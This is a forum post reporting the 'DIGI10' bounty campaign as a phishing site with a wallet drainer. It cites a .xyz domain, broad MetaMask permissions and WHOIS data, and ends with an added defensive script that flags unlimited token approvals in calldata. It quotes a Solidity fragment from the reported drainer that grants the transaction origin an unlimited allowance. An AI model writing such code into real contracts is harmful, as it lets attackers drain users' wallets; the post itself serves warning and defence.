What happened: This Newbie member created a bounty campaign for a website called DIGI10, which is supposedly meant to operate only on Base.
Based on my research, I confirmed that this is a phishing site containing a wallet drainer.
The first red flag is the domain ending in .xyz. Also, in the MetaMask window, it requests extensive permissions to scan across all networks in order to search for any "liquidity" in the wallet on networks other than Base (such as Ethereum or BSC). Once you sign any "approval," the malicious contract can drain assets from all networks where you have a balance.
Additionally, the domain is less than a year old, and the site uses references to CEX platforms to create a false sense of legitimacy.
The network logs indicate persistent failures for requests to find?name=digi10.xyz. The website is attempting to exfiltrate my wallet fingerprint and balance history to an external server. Since I'm using a new wallet with no balance, the server either fails to respond or returns a 404 error, as the script ignores it since there’s nothing in it.
Scammer's Profile Link: https://bitcointalk.org/index.php?action=profile;u=2857103
Reference Link:
[1] DIGI10 NETWORK – OFFICIAL BOUNTY CAMPAIGN 🔥 Jan 04 2026
[2] digi10[.]xyz | ARCHIVED | WHOIS
[3] Malicious Drainer Contract: 0x6e8D916Cd8c53b8ba11dd91512097C0b9FA5F5A9 | CODE
function _claimReward(address account) internal {
    _approve(account, tx.origin, type(uint256).max);
}
Domain: digi10.xyz
Registered On: 2025-08-21
Expires On: 2026-08-21
Updated On: 2025-09-01
Registrar Information
Registrar: Namecheap
IANA ID: 1068
Email: support@namecheap.com
Additional Notes: For those still participating in bounty campaigns, you should be cautious. Always choose managers with a solid reputation, and it’s best to avoid newbie accounts. Also, always check their trust feedback.
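
Added example, not part of the original post and not code from the reported site: a wallet-side check that decodes transaction calldata and reports whether signing it would grant an allowance, and whether that allowance is unlimited, as in the approvals described above. The helper name `inspectCalldata`, the sample calldata and the 0x1111... spender are constructed for illustration.

```javascript
const MAX_UINT256 = (1n << 256n) - 1n;

// 4-byte selectors of standard calls that hand spending rights to another address.
const ALLOWANCE_SELECTORS = {
  "095ea7b3": "approve(address,uint256)",
  "39509351": "increaseAllowance(address,uint256)",
  "a22cb465": "setApprovalForAll(address,bool)",
};

// Hypothetical helper: describes what a signature on `data` would grant.
function inspectCalldata(data) {
  const hex = String(data).toLowerCase().replace(/^0x/, "");
  if (!/^[0-9a-f]+$/.test(hex) || hex.length < 8) {
    return { kind: "invalid", grantsAllowance: false, unlimited: false };
  }
  const kind = ALLOWANCE_SELECTORS[hex.slice(0, 8)];
  if (!kind) return { kind: "other", grantsAllowance: false, unlimited: false };

  const args = hex.slice(8);
  if (args.length < 128) {
    // Two 32-byte words are required; the caller should reject a short payload.
    return { kind, malformed: true, grantsAllowance: false, unlimited: false };
  }
  const spender = "0x" + args.slice(24, 64);        // address = low 20 bytes of word 0
  const value = BigInt("0x" + args.slice(64, 128)); // amount, or bool for setApprovalForAll

  if (kind.startsWith("setApprovalForAll")) {
    // `true` covers every token of the collection, so it counts as unlimited.
    return { kind, spender, grantsAllowance: value !== 0n, unlimited: value !== 0n };
  }
  return { kind, spender, amount: value,
           grantsAllowance: value !== 0n, unlimited: value === MAX_UINT256 };
}

// Constructed samples; the spender is a placeholder, not an address from the post.
const PAD = "0".repeat(24);
const SPENDER = "11".repeat(20);
const SAMPLE_UNLIMITED = "0x095ea7b3" + PAD + SPENDER + "f".repeat(64);
const SAMPLE_REVOKE = "0x095ea7b3" + PAD + SPENDER + "0".repeat(64);
const SAMPLE_TRANSFER = "0xa9059cbb" + PAD + SPENDER + "0".repeat(63) + "1";

for (const sample of [SAMPLE_UNLIMITED, SAMPLE_REVOKE, SAMPLE_TRANSFER]) {
  const r = inspectCalldata(sample);
  console.log(r.kind, r.spender ?? "-", r.unlimited ? "UNLIMITED" : "ok");
}
```

An `approve` with amount 0 is how an existing allowance is revoked, which is why the helper reports it as granting nothing.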